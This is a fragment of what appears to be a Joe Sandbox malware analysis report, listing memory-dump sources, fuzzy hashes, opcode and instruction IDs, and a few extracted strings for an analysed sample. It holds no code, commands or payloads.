                                                  • Instruction Fuzzy Hash: 10314775E00219EFDF05DFA8C846A9DBBF1FB48710F1045AAE911B7280CB319901CFA4
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @
                                                  • API String ID: 0-2766056989
                                                  • Opcode ID: c92930c1bffb529d05410b0e665db3c233f3c503e8084a8434db2898df5bb99c
                                                  • Instruction ID: 19345b25982f977cd75ae4254366e118ce821faccc4cdb3ff57b2e9643712ca9
                                                  • Opcode Fuzzy Hash: c92930c1bffb529d05410b0e665db3c233f3c503e8084a8434db2898df5bb99c
                                                  • Instruction Fuzzy Hash: 95327975E04729CFEB29CF64C844BE9BBB5BF08304F0048E9D509A7651DBB59A84CF91
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 0$Flst
                                                  • API String ID: 0-758220159
                                                  • Opcode ID: 7cd9c0c060263c2916053a99d9ef24ea2b841ecdc4a8e6b0b68bd58f2e159d29
                                                  • Instruction ID: ad08c667add6399b902e97f6c3c4a94093f99e4ee4984bb57a4998f4e99b79ba
                                                  • Opcode Fuzzy Hash: 7cd9c0c060263c2916053a99d9ef24ea2b841ecdc4a8e6b0b68bd58f2e159d29
                                                  • Instruction Fuzzy Hash: FC519EB5E00B0A8FEB25DF95C488B5DFBF5FF44755F1488A9D0469B250DBB09981CB80
                                                  APIs
                                                  Strings
                                                  • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 35F90586
                                                  • kLsE, xrefs: 35F905FE
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                  • API String ID: 3446177414-2547482624
                                                  • Opcode ID: 37231a020fd8438a2570628eae5a1c72c3d9716a47fb1397edbf5ea626297520
                                                  • Instruction ID: 0ddda74791f33413c0795988024c0b26bd251bed35200c0996bcc83168a2687f
                                                  • Opcode Fuzzy Hash: 37231a020fd8438a2570628eae5a1c72c3d9716a47fb1397edbf5ea626297520
                                                  • Instruction Fuzzy Hash: 32515DB6A04B46DBEB18DFA5C440AEAB7FDAF44304F004C2ED696D7240EB749545CB61
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: 0$0
                                                  • API String ID: 3446177414-203156872
                                                  • Opcode ID: e91e48a8a53aa31b21edcd14933eb49239efcfb5f65c64e75cbd6afc36f34673
                                                  • Instruction ID: c221e57cb6aa07e07fbc06a32f13b16f87eb36d9b37471274f3ef237a1b5c700
                                                  • Opcode Fuzzy Hash: e91e48a8a53aa31b21edcd14933eb49239efcfb5f65c64e75cbd6afc36f34673
                                                  • Instruction Fuzzy Hash: 634159B66087059FD300CF28C484A5ABBE9BF89354F054A6EF988DB341D771EA05CB96